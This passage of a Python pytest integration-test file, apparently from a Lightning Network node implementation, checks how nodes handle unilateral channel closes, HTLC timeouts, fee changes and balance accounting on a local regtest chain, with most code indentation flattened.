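            q.put(err)

    t = threading.Thread(target=try_pay)
    t.daemon = True
    t.start()
    return t, q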
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_their_unilateral_in(node_factory, bitcoind):
""" This is the same as test_onchain_middleman, except that
node l1 drops to chain, not l2, reversing the unilateral
handling logic """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1_disconnects = ['=WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l2_disconnects = ['-WIRE_UPDATE_FULFILL_HTLC']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin,
'disconnect': l1_disconnects},
{'plugin': coin_mvt_plugin,
'disconnect': l2_disconnects},
{}])
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
c12, _ = l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Make sure l3 sees gossip for channel now; it can get upset
# and give bad gossip msg if channel is closed before it sees
# node announcement.
wait_for(lambda: l3.rpc.listchannels(c12)['channels'] != [])
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l1 will drop to chain.
l1.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('THEIR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, immediately
l2.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
l1.bitcoin.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l1 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_their_unilateral_out(node_factory, bitcoind):
""" Very similar to the test_onchain_middleman, except there's no
middleman, we simply want to check that our offered htlc
on their unilateral returns to us (and is accounted
for correctly) """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin},
{'disconnect': disconnects,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
route = l1.rpc.getroute(l2.info['id'], 10**8, 1)["route"]
assert len(route) == 1
q = queue.Queue()
def try_pay():
try:
# rhash is fake (so is payment_secret)
rhash = 'B1' * 32
l1.rpc.sendpay(route, rhash, payment_secret=rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l2.daemon.wait_for_log('sendrawtx exit 0')
l2.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC')
    # l1 should wait until to_self_delay (10), then reclaim its htlc onchain
l2.bitcoin.generate_block(9)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
l2.daemon.wait_for_log('Ignoring output .*_UNILATERAL/THEIR_HTLC')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# 100 blocks after last spend, l1+l2 should be done.
l2.bitcoin.generate_block(100)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l2, channel_id) == 0
assert account_balance(l1, channel_id) == 0
def test_listfunds_after_their_unilateral(node_factory, bitcoind):
"""We keep spending info around for their unilateral closes.
Make sure we show the address.
"""
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # FIXME: We can get warnings from unilateral changes, since we treat
    # such errors as soft because of LND.
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin,
"allow_warning": True},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
    # listfunds will show 1 change output, and the channels.
assert len([o for o in l1.rpc.listfunds()['outputs'] if not o['reserved']]) == 1
l1.stop()
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(100)
l1.start()
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == 2)
assert all(['address' in o for o in l1.rpc.listfunds()['outputs']])
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[
{
'may_reconnect': True,
'allow_warning': True,
}, {
'may_reconnect': True,
'disconnect': disconnects,
}
])
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
    # We recognize the different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
    # 90 blocks later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@pytest.mark.developer("needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None,
'plugin': coin_mvt_plugin},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects, options={'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for unilateral_close set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l2.daemon.wait_for_log('htlc 0: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 11000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l2.daemon.wait_for_log('htlc 1: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l2.daemon.wait_for_log('htlc 2: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
    # Two more blocks for the HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
    # Now, 100 blocks and it should be done.
bitcoind.generate_block(121)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
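# The feerate-range assertions above read min/max_possible_feerate straight
# from each node's channels table.  The same check as a helper sketch
# (hypothetical, not used by the tests; assumes the node has exactly one
# channel row):
def assert_feerate_range(node, min_feerate, max_feerate):
    """Check the possible-feerate range recorded for the node's only channel."""
    assert node.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
        'min_possible_feerate': min_feerate,
        'max_possible_feerate': max_feerate
    }]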
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
    # Test case where we have two possible commits: it will use the new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
    # Now, 100 blocks and it should be done.
bitcoind.generate_block(121)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
    # l1 and l7 ignore any HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
inv = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)
h = inv['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
    # We send the second HTLC from a different node, since nodes refuse to send
    # multiple HTLCs with the same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
    # Now the middle node goes onchain with its channel to mid+1.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    # At depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
    # Now mid+1 goes onchain with its channel to the middle node.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                               'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
    # Now, 100 blocks and it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
